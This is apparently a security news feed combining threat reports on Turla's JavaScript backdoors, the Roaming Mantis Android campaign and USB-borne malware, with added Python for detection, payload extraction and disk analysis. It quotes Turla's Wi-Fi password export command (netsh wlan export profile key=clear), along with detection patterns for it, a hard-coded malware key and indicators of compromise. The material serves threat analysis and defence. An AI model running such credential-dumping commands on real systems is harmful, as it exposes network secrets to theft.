    Since at least 2015 Turla has leveraged Javascript, powershell, and wsh in a number of ways, including in their malware dropper/installation operations as well as for implementing complete backdoors. The White Atlas framework often utilized a small Javascript script to execute the malware dropper payload after it was decrypted by the VBA macro code, then to delete the dropper afterwards. A much more advanced and highly obfuscated Javascript script was utilized in White Atlas samples that dropped a Firefox extension backdoor developed by Turla, but again the script was responsible for the simple tasks of writing out the extension.json configuration file for the extension and deleting itself for cleanup purposes.

    IcedCoffee

    Turla’s first foray into full-fledged Javascript backdoors began with the usage of the IcedCoffee backdoor that we reported on in our private June 2016 “Ice Turla” report (available to customers of Kaspersky APT Intelligence Services), which led later to their more fully functional and complex, recently deployed, KopiLuwak backdoor. IcedCoffee was initially dropped by exploit-laden RTF documents, then later by macro-enabled Office documents. The macro code used to drop IcedCoffee was a slightly modified version of that found in White Atlas, which is consistent with the code sharing present in many Turla tools. A noteworthy change to the macro code was the addition of a simple web beacon that relayed basic information to Turla controlled servers upon execution of the macro, which not only helped profile the victim but also could be used to track the effectiveness of the attack.

    IcedCoffee is a fairly basic backdoor which uses WMI to collect a variety of system and user information from the system, which is then encoded with base64, encrypted with RC4 and submitted via HTTP POST to the C2 server. IcedCoffee has no built-in command capability, instead it may receive javascript files from the C2 server, which are deobfuscated and executed in memory, leaving nothing behind on disk for forensic analysis. IcedCoffee was not widely deployed, rather it was targeted at diplomats, including Ambassadors, of European governments.

    KopiLuwak

    In November 2016, Kaspersky Lab observed a new round of weaponized macro documents that dropped a new, heavily obfuscated Javascript payload that we named KopiLuwak (one of the rarest and most expensive types of coffee in the world). The targeting for this new malware was consistent with earlier Turla operations, focusing on European governments, but it was even more selectively deployed than IcedCoffee.

    The KopiLuwak script is decoded by macro code very similar to that previously seen with IcedCoffee, but the resulting script is not the final step. This script is executed with a parameter used as a key to RC4 decrypt an additional layer of javascript that contains the system information collection and command and control beaconing functionality. KopiLuwak performs a more comprehensive system and network reconnaissance collection, and like IcedCoffee leaves very little on disk for investigators to discover other than the base script.

    Unlike IcedCoffee, KopiLuwak contains a basic set of command functionality, including the ability to run arbitrary system commands and uninstall itself. In mid-2017 a new version was discovered in which this command set had been further enhanced to include file download and data exfiltration capabilities.

    The most recent evolution in the KopiLuwak life cycle was observed in mid-2018 when we observed a very small set of systems in Syria and Afghanistan being targeted with a new delivery vector. In this campaign the KopiLuwak backdoor was encoded and delivered in a Windows shortcut (.lnk) file. The lnk files were an especially interesting development because the powershell code they contain for decoding and dropping the payload is nearly identical to that utilized by the Zebrocy threat actor a month earlier.

    Carbon – the long tail

    Carbon continues to be deployed against government and foreign affairs related organizations in Central Asia. Carbon targeting in this region has shifted across a few countries since 2014. Here, we find a new orchestrator v3.8.2 and a new injected transport library v4.0.8 deployed to multiple systems. And while we cannot identify a concrete delivery event for the dropper, its appearance coincides with the presence of meterpreter. This meterpreter reliance also coincides with wider Turla use of open source tools that we documented towards the end of 2017 and beginning of 2018.

    The Epic Turla operation reported in 2014 involved highly selective Carbon delivery and was a long term global operation that affected hundreds of victims. Only a small portion of these systems were upgraded to a malware set known as “the Carbon framework”, and even fewer received the Snake rootkit for “extreme persistence”. So, Carbon is known to be a sophisticated codebase with a long history and very selective delivery, and coincides with Snake rootkit development and deployment. In light of its age, it’s interesting that this codebase is currently being modified, with additional variants deployed to targets in 2018.

    We expect Carbon framework code modifications and predict selective deployment of this matured codebase to continue into 2019 within Central Asia and related remote locations. A complex module like this one must require some effort and investment, and while corresponding loader/injector and lateral movement malware moves to open source, this backdoor package and its infrastructure is likely not going to be replaced altogether in the short term.

    .JS attachments deliver Skipper/WhiteAtlas and WhiteBear

    We introduced WhiteBear actionable data to our private customers early 2017, and similar analysis to that report was publicly shared eight months later. Again, it was a cluster of activity that continued to grow past expectations. It is interesting because WhiteBear shared known compromised infrastructure with KopiLuwak: soligro[.]com. WhiteBear scripted spearphish attachments also follow up on initial WhiteAtlas scripting development and deployment efforts.

    Mosquito’s Changing 2018 Delivery Techniques

    In March 2018, our private report customers received actionable data on Mosquito’s inclusion of fileless and customized Posh-SecMod metasploit components. When discussion of the group’s metasploit use was made public, their tactics began to change.

    The “DllForUserFileLessInstaller” injector module maintained a compilation date of November 22, 2017, and was starting to be used by Mosquito to inject ComRAT modules into memory around January 2018. It is a small piece of metasploit injector code that accounts for issues with Wow64. Also, related open source powershell registry loader code oddly was modified to avoid AES use, and opt for 3DES encryption instead. Here is the modified Mosquito code:

    And here is the default Posh-SecMod code that they ripped from:

    We expect to see more open-source based or inspired fileless components and memory loaders from Mosquito throughout 2018. Perhaps this malware enhancement indicates that they are more interested in maintaining current access to victim organizations than developing offensive technologies.

    MiTM and Ducking the Mosquito Net

    We delivered actionable data on Mosquito to our private intel customers in early 2017. Our initial findings included data around an unusual and legitimate download URL for trojanized installers:

    hxxp://admdownload.adobe[.]com/bin/live/flashplayer23ax_ra_install.exe

    While we could not identify the MiTM techniques with accuracy at the time, it is possible either WiFi MiTM or router compromise was used in relation to these incidents. It is unlikely, but possible, that ISP-level FinFisher MiTM was used, considering multiple remote locations across the globe were targeted.

    But there is more incident data that should be elaborated on. In some cases, two “.js” files were written to disk and the infected system configured to run them at startup. Their naming provides insight into the intention of this functionality, which is to keep the malware remotely updated via google application, and maintain local settings updates by loading and running “1.txt” at every startup. In a way, this staged script loading technique seems to be shared with the IcedCoffee javascript loading techniques observed in past Turla incidents focused on European government organizations. Updates are provided from the server-side, leading to fewer malware set findings.

    • google_update_checker.js
    • local_update_checker.js

    So, we should consider the WiFi data collection that Mosquito Turla performed during these updates, as it hasn’t been documented publicly. One of the first steps that several Mosquito installer packages performed after writing and running this local_update js file was to export all of the local host’s WiFi profiles (settings and passwords) to %APPDATA%\<profile>.xml with a command line call:

    cmd.exe /c netsh wlan export profile key=clear folder="%APPDATA%"

    They then gather more network information with a call to ipconfig and arp -a. Maintaining ongoing host-based collection of wifi credentials for target networks makes it far easier to possess ongoing access to wifi networks for spoofing and MiTM, as brute-forcing or otherwise cracking weakly secured WiFi networks becomes unnecessary. Perhaps this particular method of location-dependent intrusion and access is on the decline for Mosquito Turla, as we haven’t identified new URLs delivering trojanized code.
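As an added illustration from the defender's side (not part of the original report), the following Python is a small detection routine for the behaviour described above: it scans process-creation records for the netsh wlan export profile command, rates it higher when key=clear is present (the exported XML then carries the passphrase in plaintext), and flags a parent process that follows the export with ipconfig and arp -a within a short window, the sequence the report describes. The event records are constructed sample data in a Sysmon-like shape; the field names, the 60-second window and the severity labels are my assumptions.

```python
import re

# Constructed Sysmon-style process-creation records (sample data, not real telemetry).
# "ts" is seconds since an arbitrary epoch, "ppid" is the parent process id.
SAMPLE_EVENTS = [
    {"ts": 100, "pid": 4120, "ppid": 3980, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'cmd.exe /c netsh wlan export profile key=clear folder="C:\Users\alice\AppData\Roaming"'},
    {"ts": 103, "pid": 4130, "ppid": 3980, "image": r"C:\Windows\System32\ipconfig.exe",
     "cmdline": "ipconfig /all"},
    {"ts": 104, "pid": 4140, "ppid": 3980, "image": r"C:\Windows\System32\ARP.EXE",
     "cmdline": "arp -a"},
    # Benign admin use: lists interfaces, exports nothing, must not alert.
    {"ts": 900, "pid": 5000, "ppid": 2000, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan show interfaces"},
    # Export without key=clear: keys stay encrypted in the XML, lower severity.
    {"ts": 950, "pid": 5100, "ppid": 2100, "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh wlan export profile name=Corp folder=C:\\temp"},
]

# netsh accepts the verbs in this order; match loosely on whitespace and optional ".exe".
EXPORT_RE = re.compile(r"\bnetsh(?:\.exe)?\b.*\bwlan\b.*\bexport\b.*\bprofile\b", re.IGNORECASE)
KEY_CLEAR_RE = re.compile(r"\bkey\s*=\s*clear\b", re.IGNORECASE)
FOLDER_RE = re.compile(r'folder\s*=\s*"?([^"\s]+)"?', re.IGNORECASE)
ARP_SCAN_RE = re.compile(r"^arp(?:\.exe)?\s+-a\b", re.IGNORECASE)


def find_wifi_profile_exports(events):
    """Return one alert dict per Wi-Fi profile export seen in the command lines."""
    alerts = []
    for ev in events:
        cmd = ev["cmdline"]
        if not EXPORT_RE.search(cmd):
            continue
        clear = bool(KEY_CLEAR_RE.search(cmd))
        folder = FOLDER_RE.search(cmd)
        alerts.append({
            "ts": ev["ts"], "pid": ev["pid"], "ppid": ev["ppid"],
            "severity": "high" if clear else "medium",
            "folder": folder.group(1) if folder else None,
            "reason": ("Wi-Fi profile export with plaintext keys" if clear
                       else "Wi-Fi profile export"),
        })
    return alerts


def find_recon_sequences(events, window=60):
    """Parent pids that ran a Wi-Fi export and then both ipconfig and arp -a within `window` seconds."""
    hits = []
    for alert in find_wifi_profile_exports(events):
        seen = set()
        for ev in events:
            if ev["ppid"] != alert["ppid"]:
                continue
            if not alert["ts"] <= ev["ts"] <= alert["ts"] + window:
                continue
            cmd = ev["cmdline"].strip()
            if cmd.lower().startswith("ipconfig"):
                seen.add("ipconfig")
            elif ARP_SCAN_RE.match(cmd):
                seen.add("arp")
        if {"ipconfig", "arp"} <= seen:
            hits.append(alert["ppid"])
    return hits


if __name__ == "__main__":
    for a in find_wifi_profile_exports(SAMPLE_EVENTS):
        print(a)
    print("export followed by network recon under parent pids:", find_recon_sequences(SAMPLE_EVENTS))
```

Run over the constructed events, the first record is rated high (plaintext keys written under the roaming profile directory), the fifth is rated medium, the interface listing is ignored, and parent pid 3980 is reported for the export-then-recon sequence. In a real pipeline the same two functions would be fed from the EDR's process-creation stream keyed on parent process id.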

    The Next Strike

    It’s very interesting to see ongoing targeting overlap, or the lack of overlap, with other APT activity. Noting that Turla was absent from the milestone DNC hack event where Sofacy and CozyDuke were both present, but Turla was quietly active around the globe on other projects, provides some insight as to ongoing motivations and ambitions of this group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on.

    Both Turla’s Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets. While WhiteAtlas and WhiteBear activity stretched across the globe to include foreign affairs related organizations, not all targeting consistently followed this profile. Scientific and technical centers were also targeted, and organizations outside of the political arena came under focus as well. Turla’s KopiLuwak activity does not necessarily focus on diplomatic/foreign affairs, and also winds down a different path. Instead, 2018 activity targeted government related scientific and energy research organizations, and a government related communications organization in Afghanistan. This highly selective but wider targeting set most likely will continue into 2019.
    From the targeting perspective, we see closer ties between the KopiLuwak and WhiteBear activity, and closer alignments between Mosquito and Carbon activity.

    And WhiteBear and KopiLuwak shared infrastructure while deploying unusual .js scripting. Perhaps open source offensive malware will become much more present in Mosquito and Carbon attacks as we see more meterpreter and injector code, while more uniquely innovative complex malware continues to be distributed with KopiLuwak and a possible return of WhiteBear. And as we see with the techniques borrowed from the earlier Zebrocy spearphishing, techniques are sometimes passed around and duplicated.

    CEO Fraud

    SANS Tip of the Day - Thu, 10/04/2018 - 01:00
    CEO Fraud / BEC is a type of targeted attack. It commonly involves a cyber criminal pretending to be your boss, then tricking or fooling you into sending the criminal highly sensitive information or initiating a wire transfer. Be highly suspicious of any emails demanding immediate action and/or asking you to bypass any security procedures.

    Roaming Mantis part III: iOS crypto-mining and spreading via malicious content delivery system

    Malware Alerts - Mon, 10/01/2018 - 06:00

    In Q2 2018, Kaspersky Lab published two blogposts about Roaming Mantis sharing details of this new cybercriminal campaign. In the beginning, the criminals used DNS hijacking in vulnerable routers to spread malicious Android applications of Roaming Mantis (aka MoqHao and XLoader), spoofing legitimate applications such as Facebook and Chrome. During our research, it became clear that Roaming Mantis has been rather active and has evolved quickly. The group’s malware now supports 27 languages, including multiple countries from Asia and beyond, Europe and the Middle East. In addition, they have started using web crypto-mining for PC, and an Apple phishing page for iOS devices.

    You can check previous chapters of this research here:

    In addition, we would like to thank and credit security researchers from LAC Co. Ltd. for a very insightful article describing how vulnerable routers were compromised by the Roaming Mantis group, disclosed in their Japanese blogpost in June 2018. According to this research, the threat actor logged in to routers whose control panel was accessible over the Internet using the default ID and password, and changed the legitimate DNS settings to rogue DNS settings.

    The Roaming Mantis group did not stop its activities after the publication of our reports. We have confirmed several new activities and changes to their illegal profit-gaining methods, such as web crypto-mining for iOS devices, spreading via a malicious content delivery system and so on. This blogpost reveals some details of our new findings related to Roaming Mantis, based on our research.

    Web crypto-mining for iOS devices

    The criminals previously targeted iOS devices using an Apple phishing site to steal credentials. However, they changed the HTML source code of the malicious landing page as follows:

    Part of HTML source code of the malicious landing page for iOS

    The code above shows that they disabled redirection to the fake Apple portal (with a phishing page) and added code with a web mining script (previously used only for the PC platform) to run mining on iOS devices.

    If the user visits this landing page from an iOS device, a blank page displays in the web browser. In the background, CPU usage increases to 90% immediately.

    Screen capture of the landing page and CPU monitoring tool

    Interestingly, the day after we confirmed this, the attacker switched back to Apple phishing again. We believe that the criminals, at that time, were testing the possible revenue from web mining on iOS devices, looking for an efficient way to monetize their activities.

    Filtering Japanese devices

    One thing we noticed is that the criminals responded to a number of articles and research activities coming from Japan. A new feature was added to the landing page to filter out Japanese environments:

    Added confirmation of Japanese environment for filtering

    It looks like they want to slow down infections of Japanese targets for the time being.

    Spreading via another malware delivery system

    In the middle of July 2018, the live landing page we had been monitoring unfortunately went dark. However, the malicious APK files of Roaming Mantis, detected as “Trojan-Banker.AndroidOS.Wroba.al”, were still being detected by our customers, according to our KSN data.

    Number of detected users from KSN data (Jun 10, 2018 – Sep 10, 2018)

    Our deeper investigation revealed that their new spreading method was one already used by other Android malware: the “sagawa.apk” delivery system. We published a Japanese blogpost about this Android malware in January 2018. Trend Micro named it FAKESPY and published a blogpost about it, “FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users”. According to our previous blogpost, the infection vector was a phishing SMS message spoofing a notification from a Japanese delivery company. The message contained a malicious URL; if the user clicked it, the server displayed a fake website that downloaded and installed the malicious application “sagawa.apk”. We discovered two types of such “sagawa.apk” samples:

    Comparison of the two “sagawa.apk” sample types:

    File name
      Type A: sagawa.apk
      Type B: sagawa.apk
    md5
      Type A: 956f32a28d0057805c7234d6a13aa99b
      Type B: a19f4cb93274c949e66efe13173c95e6
    File size
      Type A: 427KB (437,556)
      Type B: 2.3MB (2,381,665)
    Loader module
      Type A: \classes.dex
      Type B: \classes.dex + \lib\arm64-v8a\libkao.so, \lib\armeabi-v7a\libkao.so, \lib\x86\libkao.so, \lib\x86_64\libkao.so
    Encrypted payload (enc_data)
      Type A: \assets\a
      Type B: \assets\code.so
    Decrypt algorithm
      Type A: payload = base64_dec(zlib_dec(enc_data));
      Type B: aes_key = base64_dec(hardcoded data); payload = AES_dec(enc_data, aes_key);
    Alias
      Type A: MoqHao (McAfee), XLoader (TrendMicro)
      Type B: FAKESPY (TrendMicro)
    Old file name
      Type A: facebook.apk, chrome.apk, ${random}.apk
      Type B: sagawa.apk

    Based on detailed static analysis, they belong to different Android malware families. Both Type A and Type B have common features, such as monitoring SMS messages and stealing data from infected devices. However, there are differences in their code structure, communication protocol and other features. One significant difference is that Type B targets Japan only, unlike Type A which is multilingual. Type B contains hardcoded strings that are displayed to infected users. These strings are in Japanese only.

    Japanese messages displayed to infected users

    In addition, this malware checks whether a domestic Japanese prepaid card application is installed on the infected device.

    Check for the domestic Japanese prepaid card application “Au Wallet”

    If the application is installed on the device, the malware downloads and installs a fake application as its update.

    Unfortunately, the relationship between the Roaming Mantis group and the service owner of the “sagawa.apk” delivery mechanism isn’t very clear at the moment. They might just use the same service as customers, or might not. However, it is clear that these criminal groups use the same malware-spreading eco-system for spreading their Android malware.

    Researchers may use the following simplified python scripts to extract the payload from “sagawa.apk”:

    • sagawa.apk_typeA_payload_extractor.py

    #!/usr/bin/env python
    import sys
    import zlib
    import base64

    # Type A: the asset is zlib-compressed base64 text; inflate it, then base64-decode
    data = open(sys.argv[1], "rb").read()
    dec_z = zlib.decompress(data)
    dec_b = base64.b64decode(dec_z)
    with open(sys.argv[1] + ".dec", "wb") as fp:
        fp.write(dec_b)

    • sagawa.apk_typeB_payload_extractor.py

    #!/usr/bin/env python
    import sys
    import base64
    from Crypto.Cipher import AES  # pycrypto / pycryptodome

    # Type B: the asset is AES-encrypted with a base64 key hard-coded in libkao.so
    data = open(sys.argv[1], "rb").read()
    key = sys.argv[2]  # key is H8chGVmHxKRdjVSO14Mvgg== in libkao.so
    aes_key = base64.b64decode(key)
    aes = AES.new(aes_key, AES.MODE_ECB)  # ECB, the mode the original one-liner relied on by default
    dec = aes.decrypt(data)
    with open(sys.argv[1] + ".dec", "wb") as fp:
        fp.write(dec)
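Added example, not one of the page's scripts: a single extractor that covers both types from the comparison table. It opens the APK as a zip, picks Type A or Type B from which asset is present (assets/a versus assets/code.so), applies the matching decoding, and sanity-checks the result by its magic bytes (a dex file for Type A, a jar for Type B, as the hash list below states). pycryptodome is assumed for the AES step and is imported only when a Type B sample is processed; ECB without unpadding mirrors the page's Type B script. The build_sample_* helpers construct synthetic fixtures so the code can be tried without a real sample; no real payload bytes are included.

```python
import base64
import io
import zipfile
import zlib

# Base64 AES key the page reports is hard-coded in libkao.so (Type B).
TYPE_B_KEY_B64 = "H8chGVmHxKRdjVSO14Mvgg=="

# Asset paths from the comparison table, used to tell the two types apart.
TYPE_A_ASSET = "assets/a"
TYPE_B_ASSET = "assets/code.so"


def locate_payload(apk_bytes):
    """Return ("A" | "B", encrypted_bytes) depending on which asset the APK (a zip) carries."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = set(z.namelist())
        if TYPE_A_ASSET in names:
            return "A", z.read(TYPE_A_ASSET)
        if TYPE_B_ASSET in names:
            return "B", z.read(TYPE_B_ASSET)
    raise ValueError("neither assets/a nor assets/code.so present: not a known sagawa.apk layout")


def decode_type_a(enc_data):
    # Type A: payload = base64_dec(zlib_dec(enc_data))
    return base64.b64decode(zlib.decompress(enc_data))


def decode_type_b(enc_data, key_b64=TYPE_B_KEY_B64):
    # Type B: payload = AES_dec(enc_data, base64_dec(hardcoded key)).
    # AES-ECB with no unpadding matches the page's original extractor (pycryptodome assumed).
    from Crypto.Cipher import AES
    key = base64.b64decode(key_b64)
    if len(enc_data) % AES.block_size:
        raise ValueError("ciphertext length is not a multiple of 16: wrong asset or wrong key")
    return AES.new(key, AES.MODE_ECB).decrypt(enc_data)


def classify(blob):
    """Cheap sanity check on a decoded payload: the page reports dex (Type A) and jar (Type B)."""
    if blob.startswith(b"dex\n"):
        return "dex"
    if blob.startswith(b"PK\x03\x04"):
        return "jar/zip"
    return "unknown"


def extract(apk_bytes):
    """Locate, decode and classify the embedded payload; returns (type, kind, payload)."""
    kind, enc = locate_payload(apk_bytes)
    payload = decode_type_a(enc) if kind == "A" else decode_type_b(enc)
    return kind, classify(payload), payload


def build_sample_type_a_apk():
    """Constructed fixture: a zip whose assets/a holds zlib(base64(<fake dex header>))."""
    fake_dex = b"dex\n035\x00" + b"\x00" * 24  # constructed header, not real malware
    enc = zlib.compress(base64.b64encode(fake_dex))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"")
        z.writestr(TYPE_A_ASSET, enc)
    return buf.getvalue()


def build_sample_type_b_apk(enc_bytes=b"\x00" * 32):
    """Constructed fixture with the Type B layout; enc_bytes stands in for the AES ciphertext."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("classes.dex", b"")
        z.writestr("lib/arm64-v8a/libkao.so", b"")
        z.writestr(TYPE_B_ASSET, enc_bytes)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    # With a path argument, process that APK; otherwise demonstrate on the Type A fixture.
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_type_a_apk()
    kind, what, payload = extract(data)
    print(f"type {kind}: {len(payload)} bytes, looks like {what}")
```

The classify step is the useful part for triage: if a decoded blob is neither a dex nor a zip, the sample either uses a different key than the one on the page or a changed packaging, which is exactly the signal an analyst wants before trusting the output.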

    Spreading via prezi.com like a scam

    We also observed another malware distribution method of Roaming Mantis which is linked to prezi.com. Prezi is a popular computer application and online service to create dynamic presentations. The criminals used this service to spread their scam. When a user visits a page crafted by the attackers, a link is shown offering free content such as adult videos, games, comics, music and so on, presented as pirated copies.

    Redirection to a scam page

    Based on our research, there were multiple messages leveraging different social engineering tricks to invite users to a scam website. On the other hand, the Roaming Mantis’ landing page was found to be linked to several such accounts carrying out redirections.

    Corrupted landing page code from Roaming Mantis posted on prezi.com

    However, fortunately this code does not work because of mistakes made during the code preparation stage.

    Records of stolen data

    Kaspersky Lab discovered fragments of data stolen from victims’ Android devices via Type A of the malware, which suggests thousands of compromised victims:

    Suspected stolen data from victims’ Android devices

    This data contained phone number, date, IP, language, email/id, password, name, date of birth, address, credit card information including cvv, bank information, and secret question and answer in Simplified Chinese. Data headers in Chinese suggest that the attackers are fluent in Chinese – unless this is a false flag, of course. The first column seems to contain the record number, which in July was already over 4,800. The user device language setting may indicate victims’ geography. Below is a pie chart created from the language data:

    Victims’ language settings

    The top language is “en-us” (39%), the second “ko-kr”, and the third “ru”. Judging from this data, the victims’ geographical distribution has changed significantly since our first report. This might be due to the update adding support for 27 languages and to the new distribution strategies. “en-us” may be the most common simply because English is used as a second language in several countries.

    Conclusions

    In previous reports, we claimed that the Roaming Mantis campaign had evolved significantly in a short period of time, applying new attack methods and expanding its targets. It seems that the attack doesn’t stop developing. In our recent research, we found that they probed using a web miner for iOS, instead of redirecting to a fake Apple website.

    Another new method they applied is the use of a malware delivery eco-system that is probably operated by a third party and was used to spread other (maybe even unrelated) malware in the past. The infection vector in that case was an SMS message with a malicious link that led a user to a fake web site that offered a download of the malicious apk file “sagawa.apk”. It is not clear how Roaming Mantis and the distributor of “sagawa.apk” are related, but it’s worth mentioning the fact that they are now using the same eco-system.

    Roaming Mantis is also trying to spread its malware via prezi.com, with a scam that offers a visitor free content such as videos and more.

    Judging from the list of stolen credentials, the attackers seem to have stolen a large amount of data from victims worldwide. This gives us a glimpse of the real scale of the attack, but we believe it is just the tip of the iceberg.

    We strongly recommend that Android users turn off the option that allows installation of applications from third-party repositories, to keep their device safe. They should also be suspicious if their phones become unusually hot, which may be a side-effect of the hidden crypto-mining application in action.

    Kaspersky Lab products detect this malware with the following verdict:

    • HEUR:Trojan-Banker.AndroidOS.Wroba

    IoCs

    Malicious hosts:
    • 59.105.6[.]230
    • sagawa-otqwt[.]com
    • sagawa-polsw[.]com

    Hashes of Type A:
    • 956f32a28d0057805c7234d6a13aa99b sagawa.apk
    • 3562f9de6dbe70c2e19a20d8683330ce \classes.dex
    • 01fa0039b62c5db8d91dfc6b75b246f8 decrypted payload (dex file) from \assets\a

    Hashes of Type B:
    • a19f4cb93274c949e66efe13173c95e6 sagawa.apk
    • 5e913208ecc69427efb6bbf9e6505624 \classes.dex
    • 67bc2e8beb14b259a5c60fe7a31e6795 \arm64-v8a/libkao.so
    • f120f5f78c7ef762996314cf10f343af \armeabi-v7a/libkao.so
    • efe54c22e2b28a44f723d3479487620c \x86_64/libkao.so
    • e723c6aec4433f3c6e5d3d24fe810e05 \x86/libkao.so
    • daeccda295de93cf767fd39a86a44355 decrypted payload (jar file) from \assets\code.so
    • 581b08b277a8504ed222a71c19cea5f9 classes.dex from decrypted payload

    Ransomware

    SANS Tip of the Day - Thu, 09/27/2018 - 01:00
    Ransomware is a special type of malware. Once it has infected your computer, it encrypts all of your files and demands that you pay a ransom if you want your files back. Be suspicious of any emails trying to trick you into opening infected attachments or clicking on malicious links; common sense is your best defense. In addition, backups are often the only way you can recover from ransomware.

    USB threats from malware to miners

    Malware Alerts - Tue, 09/25/2018 - 06:00

    Introduction

    In 2016, researchers from the University of Illinois left 297 unlabelled USB flash drives around the university campus to see what would happen. 98% of the dropped drives were picked up by staff and students, and at least half were plugged into a computer in order to view the content. For a hacker trying to infect a computer network, those are pretty irresistible odds.

    USB devices have been around for almost 20 years, offering an easy and convenient way to store and transfer digital files between computers that are not directly connected to each other or to the internet. This capability has been exploited by cyberthreat actors, most famously by the Stuxnet worm in 2010, which used USB devices to inject malware into the network of an Iranian nuclear facility.

    Today, cloud services such as Dropbox have taken on much of the heavy lifting in terms of file storage and transfer, and there is greater awareness of the security risks associated with USB devices. Their use as an essential business tool is declining. Despite this, millions of USB devices are still produced and distributed annually, with many destined for use in homes, businesses and marketing promotion campaigns like trade show giveaways.

    USB devices remain a target for cyberthreats. Kaspersky Lab data for 2017 shows that every 12 months or so, around one in four users worldwide is affected by a ‘local’ cyber incident. These are attacks detected directly on a user’s computer and include infections caused by removable media like USB devices.

    This short report reviews the current cyberthreat landscape for removable media, particularly USBs, and provides advice and recommendations on protecting these little devices and the data they carry.

    Methodology and key findings

    The overview is based on detections by Kaspersky Lab’s file protection technologies in the drive root of user computers, with a specific scan filter and other measures applied. It covers malware-class attacks only and does not include detections of potentially dangerous or unwanted programs such as adware or risk tools (programs that are not inherently malicious, but are used to hide files or terminate applications, etc. that could be used with malicious intent). The detection data is shared voluntarily by users via Kaspersky Security Network (KSN).

    Key findings
    • USB devices and other removable media are being used to spread cryptocurrency mining software – and have been since at least 2015. Some victims were found to have been carrying the infection for years.
    • The rate of detection for the most popular bitcoin miner, Trojan.Win64.Miner.all, is growing by around one-sixth year-on-year.
    • One in 10 of all users hit by removable media infections in 2018 was targeted with this crypto-miner (around 9.22%, up from 6.7% in 2017 and 4.2% in 2016).
    • Other malware spread through removable media/USBs includes the Windows LNK family of Trojans, which has been among the top three USB threats detected since at least 2016.
    • The 2010 Stuxnet exploit, CVE-2010-2568, remains one of the top 10 malicious exploits spread via removable media.
    • Emerging markets are the most vulnerable to malicious infection spread by removable media – with Asia, Africa and South America among the most affected – but isolated hits were also detected in countries in Europe and North America.
    • Dark Tequila, a complex banking malware reported on August 21, 2018 has been claiming consumer and corporate victims in Mexico since at least 2013, with the infection spreading mainly through USB devices.

    The evolving cyberthreat landscape for USBs

    Infections caused by removable media are defined as local threats – those that are detected directly on a user’s computer, for example, during a scheduled, installation or user-initiated security scan. Local threats differ from threats targeting computers over the internet (web-borne threats), which are far more prevalent. Local infections can also be caused by an encrypted malicious program hidden in a complex installer. To isolate the data for malware spread by removable media such as USB devices, we took the detections triggered in the drive root of affected computers – a strong indicator that the infection source is removable media.

    This data shows that the number of removable media (drive root) threat detections has declined steadily since 2014, but the overall rate of decline may be slowing down. In 2014, the ratio between a user affected by a removable media threat and the total number of such threats detected was 1:42; by 2017 this had dropped by around half to 1:25; with the estimate for 2018 around 1:22.

    These numbers pale in comparison to web-borne threats: in 2017, Kaspersky Lab’s file antivirus detected 113.8 million likely removable media threats, while its web antivirus repelled just under 1.2 billion attacks launched from online resources. In light of this, it can be easy to overlook the enduring risks presented by removable media, even though around four million users worldwide will be infected in this way in 2018.

    *Total number (in millions) of malware detections triggered in the drive root of user computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN

    *Number of unique users (in millions) with malware detections triggered in the drive root of computers, a strong indicator of infection by removable media, 2013 – 2018. Source: KSN

    USBs as a tool for advanced threat actors

    USB devices appeal to attackers targeting computer networks that are not connected to the internet – such as those powering critical national infrastructure. The most famous example of this is probably the Stuxnet campaign. In 2009 and 2010, the Stuxnet worm targeted Iran’s nuclear facilities in order to disrupt operations.

    USB devices were used to inject malware into the facilities’ air-gapped networks. Among other things, the devices included an exploit to a Windows LNK vulnerability (CVE-2010-2568) that enabled remote code execution. Other advanced threat actors, including Equation Group, Flame, Regin and HackingTeam, have all integrated exploits for this vulnerability into removable media to use in attacks.

    Further, the structure of most USB devices allows them to be converted to provide hidden storage compartments, for the removal of stolen data, for example. The ProjectSauron 2016 toolkit was found to include a special module designed to move data from air-gapped networks to internet-connected systems. This involved USB drives that had been formatted to change the size of the partition on the USB disk, reserving some hidden space (several hundred megabytes) at the end of the disk for malicious purposes.
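    The hidden-space layout described above leaves a measurable trace: the last partition ends well before the physical end of the disk. The following is an added example (not code from the report or from Kaspersky Lab) that parses a classic MBR partition table from a raw image and reports the unallocated tail; it assumes 512-byte sectors and an MBR layout (GPT disks are out of scope), and the disk images and threshold are constructed for illustration.

```python
"""Added example: flag a removable disk whose partition table leaves a large
unpartitioned tail, the pattern the report attributes to the ProjectSauron
USB module. Not part of the original report; MBR-only, 512-byte sectors."""
import struct

SECTOR = 512                 # logical sector size assumed for the image
PART_TABLE_OFFSET = 446      # first of the four 16-byte MBR partition entries
ENTRY_SIZE = 16
MBR_SIGNATURE = b"\x55\xaa"  # boot signature stored at bytes 510-511


def parse_mbr_partitions(mbr):
    """Return (type, start_lba, sector_count) for every populated primary entry."""
    if len(mbr) < SECTOR or mbr[510:512] != MBR_SIGNATURE:
        raise ValueError("not a valid MBR sector (missing 0x55AA signature)")
    parts = []
    for i in range(4):
        off = PART_TABLE_OFFSET + i * ENTRY_SIZE
        ptype = mbr[off + 4]                               # partition type byte
        start_lba, count = struct.unpack_from("<II", mbr, off + 8)  # LE uint32 pair
        if ptype == 0 or count == 0:                       # empty slot
            continue
        parts.append((ptype, start_lba, count))
    return parts


def unallocated_tail_sectors(mbr, disk_sectors):
    """Sectors between the end of the last partition and the end of the disk."""
    parts = parse_mbr_partitions(mbr)
    if not parts:
        return disk_sectors                                # nothing partitioned at all
    last_end = max(start + count for _, start, count in parts)
    if last_end > disk_sectors:
        raise ValueError("partition table extends beyond the reported disk size")
    return disk_sectors - last_end


def assess_usb_image(mbr, disk_sectors, threshold_mib=64):
    """A few MiB of alignment slack is normal; hundreds of MiB on a USB stick is
    the case worth a closer look. The 64 MiB threshold is a constructed default."""
    tail = unallocated_tail_sectors(mbr, disk_sectors)
    tail_mib = tail * SECTOR / (1024 * 1024)
    return {"tail_sectors": tail, "tail_mib": tail_mib,
            "suspicious": tail_mib >= threshold_mib}


def assess_image_file(path, threshold_mib=64):
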